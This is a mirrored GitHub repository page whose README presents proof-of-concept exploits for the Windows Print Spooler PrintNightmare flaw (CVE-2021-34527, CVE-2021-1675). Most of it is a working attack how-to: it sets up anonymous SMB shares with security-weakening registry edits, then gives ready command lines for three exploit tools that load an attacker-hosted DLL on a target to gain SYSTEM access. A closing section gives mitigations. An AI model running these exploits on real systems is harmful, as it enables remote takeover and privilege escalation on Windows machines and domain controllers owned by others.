https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527

PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits
https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527

cve-2021-1675 cve-2021-34527 howto-tutorial printnightmare rce windowsexploits

Last synced: 3 months ago
JSON representation

PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits

• Host: GitHub
• URL: https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
• Owner: nemo-wq
• Created: 2021-07-03T15:15:12.000Z (over 3 years ago)
• Default Branch: master
• Last Pushed: 2021-09-13T12:12:17.000Z (about 3 years ago)
• Last Synced: 2024-04-24T14:15:17.767Z (6 months ago)
• Topics: cve-2021-1675, cve-2021-34527, howto-tutorial, printnightmare, rce, windowsexploits
• Language: C
• Homepage:
• Size: 2.79 MB
• Stars: 107
• Watchers: 8
• Forks: 39
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - nemo-wq/PrintNightmare-CVE-2021-34527 - PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits (C)

README

        
# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675)

## Summary

This is a remote code execution vulnerability that can be used to obtain SYSTEM level privileges by an authenticated remote user against Windows machines running the print spooler service. An attacker could then use that access to create new accounts, attempt to install programs; view, change, or delete data; or create new accounts with full user rights.

This vulnerability exists due to an authorisation bypass bug in the Print Spooler service ```spoolsv.exe``` on Windows systems, which allows authenticated remote users to install print drivers using the RPC call RpcAddPrinterDriver and specify a driver file located on a remote location. A malicious user exploiting this could obtain SYSTEM level privileges on a Windows system running this service by injecting malicious DLLs as part of installing a print driver.

While Microsoft has released an update for CVE-2021-1675, this update does not protect Active Directory domain controllers or Windows systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.

There are three PoC exploit implementations in this repo:

* CVE-2021-34527 python script by [cube0x0](https://github.com/cube0x0)

* SharpPrintNightmare by [cube0x0](https://github.com/cube0x0)

* EXP by [afwu](https://github.com/afwu) ([Printnightmare](https://github.com/afwu/PrintNightmare))

## Technical Details

### Affected Systems

* All versions of Windows contain the vulnerable code and are vulnerable as of 4th July 2021. The exploits have been tested on Windows Windows 2019 Server & Windows 10 Pro.

## Proof of Concept Exploits

As the RPC service allows the client machine to provide a location for the print drivers to be downloaded by the remote server, the following example options can be used to host the payload and the path provided when running the exploit:

### Samba Share Setup

* ### Unix/Linux:

    

    In order to set up guest access in Samba, you need to set up a user that it will pretend to log in as. Ensure that there exists a user `smbuser` in the system, otherwise create one with password `password`

    ```

    id -u smbuser &>/dev/null || useradd -p $(openssl passwd -1 password) smbuser

    ```

    

    Edit the /etc/samba/smb.conf and enable anonymous access

    ```

    [global]

        map to guest = Bad User

        server role = standalone server

        usershare allow guests = yes

        idmap config * : backend = tdb

        smb ports = 445

    [smb]

        comment = Samba

        path = /tmp/

        guest ok = yes

        read only = no

        browsable = yes

        force user = smbuser

    ```

* ### Windows:

    ```

    mkdir C:\share

    icacls C:\share\ /T /grant Anonymous` logon:r

    icacls C:\share\ /T /grant Everyone:r

    New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'

    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes

    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f

    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f

    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

    # Reboot

    ```

The below are slightly updated instructions from the ones provided by [cube0x0](https://github.com/cube0x0):

## CVE-2021-34527 python script

This is the Impacket implementation of the Printnightmare exploit by [cube0x0](https://github.com/cube0x0).

Before running the exploit you need to install a modified version of Impacket:

```

pip3 uninstall impacket

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

```

### Exploit Usage:

Exploit code for this vulnerability needs to be run using Python 3

```

usage: CVE-2021-34527.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675/34527 implementation.

positional arguments:

  target                [[domain/]username[:password]@]

  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:

  -h, --help            show this help message and exit

authentication:

  -hashes LMHASH:NTHASH

                        NTLM hashes, format is LMHASH:NTHASH

connection:

  -target-ip ip address

                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name

                        and you cannot resolve it

  -port [destination port]

                        Destination port to connect to SMB Server

Example;

./CVE-2021-34527.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'

./CVE-2021-34527.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'

```

## SharpPrintNightmare

The SharpPrintNightmare/ directory contains the C# Implementation of the Printnightmare exploit, for both Local Privilege Escalation (LPE) (CVE-2021-1675), as well as Remote Code Execution (RCE). 

The RCE functionality requires execution with local admin privileges on the machine running the exploit.

### Exploit Usage:

```

#LPE

C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context

SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'

#RCE using runas /netonly

SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' domain.local domain_username password

```

## EXP/ Usage instructions from [afwu](https://github.com/afwu/)

### Exploit Usage:

```

.\PrintNightmare.exe dc_ip path_to_exp user_name password

Example:

.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123##

```

## Mitigation/Workarounds

### Determine if the Print Spooler service is running

Run the following:

```

Get-Service -Name Spooler

```

If the Print Spooler is running or if the service is not set to disabled, select one of the following options to either disable the Print Spooler service, or to Disable inbound remote printing through Group Policy:

### Option 1 - Disable the Print Spooler service

If disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands (recommendation from Microsoft):

```

Stop-Service -Name Spooler -Force

Set-Service -Name Spooler -StartupType Disabled

```

or Disable Spooler service using registry

```

Stop-Service Spooler

REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f

```

or Uninstall Print-Services

```

Uninstall-WindowsFeature Print-Services

```

This will disable the ability to print both locally and remotely.

### Option 2 - Disable inbound remote printing through Group Policy

You can also configure the settings via Group Policy as follows:

```

Computer Configuration / Administrative Templates / Printers

```

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.

For more information see: Use [Group Policy settings to control printers](https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer).

## Acknowledgements

* According to MSRC security bullion, this vulnerability is reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai.

* [cube0x0](https://github.com/cube0x0)

* [afwu](https://github.com/afwu)